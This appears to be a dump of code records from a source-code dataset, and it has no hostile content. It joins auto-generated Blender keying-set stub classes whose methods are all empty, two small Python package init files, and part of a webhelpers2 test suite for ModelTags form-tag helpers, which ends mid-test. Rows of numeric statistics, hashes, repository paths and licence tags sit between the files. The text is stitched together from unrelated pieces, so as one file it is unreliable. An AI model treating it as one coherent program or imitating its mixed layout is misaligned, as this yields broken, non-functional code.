def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_LocScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_Location(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_RotScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_Rotation(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_Scaling(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLoc(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLocRot(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLocRotScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualLocScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualRot(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualRotScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_VisualScaling(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_options = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_WholeCharacter(bpy_types.KeyingSetInfo):
badBonePrefixes = None
''' '''
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def addProp(self, ksi, ks, bone, prop, index, use_groups):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def doBBone(self, ksi, context, ks, pchan):
'''
'''
pass
def doCustomProps(self, ksi, ks, bone):
'''
'''
pass
def doLoc(self, ksi, ks, bone):
'''
'''
pass
def doRot3d(self, ksi, ks, bone):
'''
'''
pass
def doRot4d(self, ksi, ks, bone):
'''
'''
pass
def doScale(self, ksi, ks, bone):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, bone):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_WholeCharacterSelected(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def addProp(self, ksi, ks, bone, prop, index, use_groups):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def doBBone(self, ksi, context, ks, pchan):
'''
'''
pass
def doCustomProps(self, ksi, ks, bone):
'''
'''
pass
def doLoc(self, ksi, ks, bone):
'''
'''
pass
def doRot3d(self, ksi, ks, bone):
'''
'''
pass
def doRot4d(self, ksi, ks, bone):
'''
'''
pass
def doScale(self, ksi, ks, bone):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, bone):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
def register():
    """No-op stub for Blender's add-on registration entry point."""
    return None
def unregister():
    """No-op stub for Blender's add-on unregistration entry point."""
    return None
| 12.025852
| 66
| 0.374023
| 3,307
| 40,936
| 4.396432
| 0.027215
| 0.24025
| 0.318523
| 0.075108
| 0.975445
| 0.975445
| 0.975445
| 0.975445
| 0.975445
| 0.975445
| 0
| 0.000192
| 0.49062
| 40,936
| 3,403
| 67
| 12.029386
| 0.697055
| 0
| 0
| 0.976357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.455342
| false
| 0.455342
| 0.002627
| 0
| 0.544658
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 12
|
593e96936ea686c85e41cacef1c035331ff7f710
| 180
|
py
|
Python
|
test/automation/model/__init__.py
|
agupta54/ulca
|
c1f570ac254ce2ac73f40c49716458f4f7cbaee2
|
[
"MIT"
] | 3
|
2022-01-12T06:51:51.000Z
|
2022-02-23T18:54:33.000Z
|
test/automation/model/__init__.py
|
agupta54/ulca
|
c1f570ac254ce2ac73f40c49716458f4f7cbaee2
|
[
"MIT"
] | 6
|
2021-08-31T19:21:26.000Z
|
2022-01-03T05:53:42.000Z
|
test/automation/model/__init__.py
|
agupta54/ulca
|
c1f570ac254ce2ac73f40c49716458f4f7cbaee2
|
[
"MIT"
] | 8
|
2021-08-12T08:07:49.000Z
|
2022-01-25T04:40:51.000Z
|
from . import loader
from . import model_all
from . import model_upload
from . import model_task
from . import model_publish
from . import model_list
from . import model_benchmark
| 22.5
| 29
| 0.805556
| 27
| 180
| 5.148148
| 0.37037
| 0.503597
| 0.647482
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 180
| 7
| 30
| 25.714286
| 0.914474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
59ab36eb3e1ecd63992f65d8f462a52ad7910c64
| 220
|
py
|
Python
|
output/models/ms_data/wildcards/wild_z003_a_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/wildcards/wild_z003_a_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/wildcards/wild_z003_a_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from output.models.ms_data.wildcards.wild_z003_a_xsd.wild_z003_a import Elt1
from output.models.ms_data.wildcards.wild_z003_a_xsd.wild_z003_b import (
Ct,
Elem,
)
__all__ = [
"Elt1",
"Ct",
"Elem",
]
| 18.333333
| 76
| 0.704545
| 35
| 220
| 3.971429
| 0.457143
| 0.230216
| 0.194245
| 0.258993
| 0.733813
| 0.733813
| 0.733813
| 0.733813
| 0.733813
| 0.733813
| 0
| 0.077348
| 0.177273
| 220
| 11
| 77
| 20
| 0.690608
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
59b98b34f9a3cf29d7e9d4b0f8b8edf64ce86b0d
| 9,568
|
py
|
Python
|
webhelpers2/tests/test_modeltags.py
|
einSelbst/WebHelpers2
|
1675e2f7e53f296e7750499176be1fabca0454f3
|
[
"BSD-3-Clause"
] | null | null | null |
webhelpers2/tests/test_modeltags.py
|
einSelbst/WebHelpers2
|
1675e2f7e53f296e7750499176be1fabca0454f3
|
[
"BSD-3-Clause"
] | null | null | null |
webhelpers2/tests/test_modeltags.py
|
einSelbst/WebHelpers2
|
1675e2f7e53f296e7750499176be1fabca0454f3
|
[
"BSD-3-Clause"
] | null | null | null |
from webhelpers2.html import HTML
from webhelpers2.html.tags import *
from . import HTMLTestCase
class Holder(object):
    """Attribute bag: copies every key/value pair from *settings* onto
    the instance as an attribute of the same name."""

    def __init__(self, settings):
        for key, value in settings.items():
            setattr(self, key, value)
class TestModelTagsHelperWithObject(HTMLTestCase):
    """Exercise ModelTags form-tag helpers backed by an attribute object."""

    def setup_method(self, method):
        # Record object whose attributes supply the field values.
        record = Holder({"name":"Jim", "phone":"123-456-7890", "fulltime":True, "fired":False, "password":"bacon", "longtext":"lorem ipsum lorem ipsum\n"*10, "favcolor":"blue", "lang":"en"})
        self.m = ModelTags(record)

    def test_check_box(self):
        expected = '<input checked="checked" id="fulltime" name="fulltime" type="checkbox" value="1" />'
        assert self.m.checkbox("fulltime") == expected

    def test_hidden_field(self):
        expected = '<input id="name" name="name" type="hidden" value="Jim" />'
        assert self.m.hidden("name") == expected

    def test_password_field(self):
        expected = '<input id="name" name="name" type="password" value="Jim" />'
        assert self.m.password("name") == expected

    def test_file_field(self):
        expected = '<input id="name" name="name" type="file" value="Jim" />'
        assert self.m.file("name") == expected

    def test_radio_button(self):
        # "blue" matches the record value, so the button renders checked.
        expected = '<input checked="checked" id="favcolor_blue" name="favcolor" type="radio" value="blue" />'
        assert self.m.radio("favcolor", "blue") == expected

    def test_radio_button2(self):
        # "red" does not match the record value, so no checked attribute.
        expected = '<input id="favcolor_red" name="favcolor" type="radio" value="red" />'
        assert self.m.radio("favcolor", "red") == expected

    def test_text_area(self):
        expected = '<textarea id="longtext" name="longtext">' + "lorem ipsum lorem ipsum\n"*10 + '</textarea>'
        assert self.m.textarea("longtext") == expected

    def test_text_field(self):
        expected = '<input id="name" name="name" type="text" value="Jim" />'
        assert self.m.text("name") == expected

    def test_select(self):
        actual = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
        expected = '<select id="lang" name="lang">\n<option selected="selected" value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
        assert actual == expected
class TestModelTagsHelperWithDict(TestModelTagsHelperWithObject):
def setup_method(self, method):
obj = {"name":"Jim", "phone":"123-456-7890", "fulltime":True, "fired":False, "password":"bacon", "longtext":"lorem ipsum lorem ipsum\n"*10, "favcolor":"blue", "lang":"en"}
self.m = ModelTags(obj, use_keys=True)
def test_check_box(self):
b = '<input checked="checked" id="fulltime" name="fulltime" type="checkbox" value="1" />'
assert self.m.checkbox("fulltime") == b
def test_check_box_with_label_and_label_class(self):
a = self.m.checkbox("fulltime", label="Full Time", label_class="cl")
b = '<label class="cl"><input checked="checked" id="fulltime" name="fulltime" type="checkbox" value="1" /> Full Time</label>'
self.check(a, b)
def test_hidden_field(self):
b = '<input id="name" name="name" type="hidden" value="Jim" />'
assert self.m.hidden("name") == b
def test_password_field(self):
b = '<input id="name" name="name" type="password" value="Jim" />'
assert self.m.password("name") == b
def test_file_field(self):
b = '<input id="name" name="name" type="file" value="Jim" />'
assert self.m.file("name") == b
def test_radio_button(self):
b = '<input checked="checked" id="favcolor_blue" name="favcolor" type="radio" value="blue" />'
assert self.m.radio("favcolor", "blue") == b
def test_radio_button2(self):
b = '<input id="favcolor_red" name="favcolor" type="radio" value="red" />'
assert self.m.radio("favcolor", "red") == b
def test_radio_button_with_label_and_label_class(self):
a = self.m.radio("favcolor", "blue", label="Blue", label_class="cl")
b = '<label class="cl"><input checked="checked" id="favcolor_blue" name="favcolor" type="radio" value="blue" /> Blue</label>'
self.check(a, b)
def test_text_area(self):
b = '<textarea id="longtext" name="longtext">lorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\n</textarea>'
assert self.m.textarea("longtext") == b
def test_text_field(self):
b = '<input id="name" name="name" type="text" value="Jim" />'
assert self.m.text("name") == b
def test_select(self):
    """select() marks the option matching the model value as selected."""
    rendered = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
    expected = '<select id="lang" name="lang">\n<option selected="selected" value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
    assert rendered == expected
class TestIdGeneration(object):
    """Both supported id_format syntaxes must expand to the same id."""

    def check_id_format_syntax(self, id_format):
        # _update_id should fill in the "id" attribute using the format.
        tags = ModelTags(None, id_format=id_format)
        attrs = {}
        tags._update_id("foo", attrs)
        assert attrs == {"id": "person:foo"}

    def test_braces_syntax(self):
        self.check_id_format_syntax("person:{}")

    def test_percent_syntax(self):
        """Backward compatibility with WebHelpers."""
        self.check_id_format_syntax("person:%s")
class TestModelTagsHelperWithIdGeneration(TestModelTagsHelperWithObject):
    """Re-run the object-backed helper tests with an id_format prefix."""

    def setup_method(self, method):
        record = Holder({
            "name": "Jim",
            "phone": "123-456-7890",
            "fulltime": True,
            "fired": False,
            "password": "bacon",
            "longtext": "lorem ipsum lorem ipsum\n" * 10,
            "favcolor": "blue",
            "lang": "en",
        })
        self.m = ModelTags(record, id_format="person:%s")

    def test_check_box(self):
        expected = '<input checked="checked" id="person:fulltime" name="fulltime" type="checkbox" value="1" />'
        assert self.m.checkbox("fulltime") == expected

    def test_hidden_field(self):
        expected = '<input id="person:name" name="name" type="hidden" value="Jim" />'
        assert self.m.hidden("name") == expected

    def test_password_field(self):
        expected = '<input id="person:name" name="name" type="password" value="Jim" />'
        assert self.m.password("name") == expected

    def test_file_field(self):
        expected = '<input id="person:name" name="name" type="file" value="Jim" />'
        assert self.m.file("name") == expected

    def test_radio_button(self):
        expected = '<input checked="checked" id="person:favcolor_blue" name="favcolor" type="radio" value="blue" />'
        assert self.m.radio("favcolor", "blue") == expected

    def test_radio_button2(self):
        expected = '<input id="person:favcolor_red" name="favcolor" type="radio" value="red" />'
        assert self.m.radio("favcolor", "red") == expected

    def test_text_area(self):
        expected = '<textarea id="person:longtext" name="longtext">lorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\nlorem ipsum lorem ipsum\n</textarea>'
        assert self.m.textarea("longtext") == expected

    def test_text_field(self):
        expected = '<input id="person:name" name="name" type="text" value="Jim" />'
        assert self.m.text("name") == expected

    def test_select(self):
        rendered = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
        expected = '<select id="person:lang" name="lang">\n<option selected="selected" value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
        assert rendered == expected
class TestModelTagsHelperWithoutObject(object):
    """With no backing object, helpers must render empty/unchecked widgets."""

    def setup_method(self, method):
        self.m = ModelTags("")

    def test_check_box(self):
        expected = '<input id="fulltime" name="fulltime" type="checkbox" value="1" />'
        assert self.m.checkbox("fulltime") == expected

    def test_hidden_field(self):
        expected = '<input id="name" name="name" type="hidden" value="" />'
        assert self.m.hidden("name") == expected

    def test_password_field(self):
        expected = '<input id="name" name="name" type="password" value="" />'
        assert self.m.password("name") == expected

    def test_file_field(self):
        expected = '<input id="name" name="name" type="file" value="" />'
        assert self.m.file("name") == expected

    def test_radio_button(self):
        expected = '<input id="favcolor_blue" name="favcolor" type="radio" value="blue" />'
        assert self.m.radio("favcolor", "blue") == expected

    def test_radio_button2(self):
        expected = '<input id="favcolor_red" name="favcolor" type="radio" value="red" />'
        assert self.m.radio("favcolor", "red") == expected

    def test_text_area(self):
        expected = '<textarea id="longtext" name="longtext"></textarea>'
